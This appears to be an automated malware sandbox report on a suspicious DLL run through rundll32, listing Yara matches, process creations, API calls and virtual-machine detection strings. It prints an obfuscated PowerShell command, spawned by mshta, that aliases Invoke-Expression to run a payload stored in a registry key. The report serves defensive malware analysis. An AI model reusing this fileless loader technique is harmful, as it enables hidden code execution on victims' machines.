File source: 2.3.rundll32.exe.e294a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a56b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a294a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.430345543.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.382198486.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.383295938.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.384393230.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.433324179.000000000472F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318295825.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.442468784.0000000005370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318372991.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
2_2_053765C2 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
2_2_053799BC |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0538BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
2_2_0538BAD1 |
Source: explorer.exe, 0000001C.00000000.410113931.00000000080ED000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 0000001C.00000000.412960609.0000000008223000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d |
Source: explorer.exe, 0000001C.00000000.423131615.0000000000680000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _VMware_SATA_CD00#5&280b647& |
Source: explorer.exe, 0000001C.00000000.399489791.000000000069D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001C.00000000.412960609.0000000008223000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00 |
Source: explorer.exe, 0000001C.00000000.412960609.0000000008223000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t] |
Source: RuntimeBroker.exe, 00000024.00000000.574777495.000001C95EA58000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}so |
Source: explorer.exe, 0000001C.00000000.429874751.00000000062C4000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001C.00000000.425664121.0000000004287000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0 |
Source: rundll32.exe, 00000002.00000002.431275495.0000000000613000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.326934628.00000000005D9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.431133412.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.326967652.0000000000613000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: explorer.exe, 0000001C.00000000.412960609.0000000008223000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^ |
Source: explorer.exe, 0000001C.00000000.441959612.000000000820E000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: mshta.exe, 00000012.00000003.334344085.000001AD4943E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ |
Source: explorer.exe, 0000001C.00000000.410113931.00000000080ED000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 0000001C.00000000.412960609.0000000008223000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00l |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name elbnsvbf -value gp; new-alias -name dbiansi -value iex; dbiansi ([System.Text.Encoding]::ASCII.GetString((elbnsvbf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\suyq54bl.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\que4qvkg.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES99B1.tmp" "c:\Users\user\AppData\Local\Temp\CSCA3AF429E64284F6FBA5C7EF0C7D44D.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB529.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B2F5B9E5B5E42FBBCD6AAD130D3A7FD.TMP" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Jump to behavior |
Source: explorer.exe, 0000001C.00000000.395726753.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.399443839.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.420424436.0000000000688000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ProgmanEXE^ |
Source: explorer.exe, 0000001C.00000000.404972280.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.423652332.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.443449129.00000000080ED000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: explorer.exe, 0000001C.00000000.423652332.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.400092298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.421418422.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp |
Binary or memory string: Progman |
Source: explorer.exe, 0000001C.00000000.423652332.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.400092298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.421418422.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp |
Binary or memory string: Progmanlock |
Source: explorer.exe, 0000001C.00000000.423186829.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.420593324.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.395740306.000000000069D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Shell_TrayWnd4 |
Source: explorer.exe, 0000001C.00000000.423652332.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.400092298.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.421418422.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp |
Binary or memory string: WProgram Manager |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation |
Jump to behavior |
Source: Yara match |
File source: 00000002.00000003.271978374.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.319141424.00000000048AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272282667.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.317438075.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271906753.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
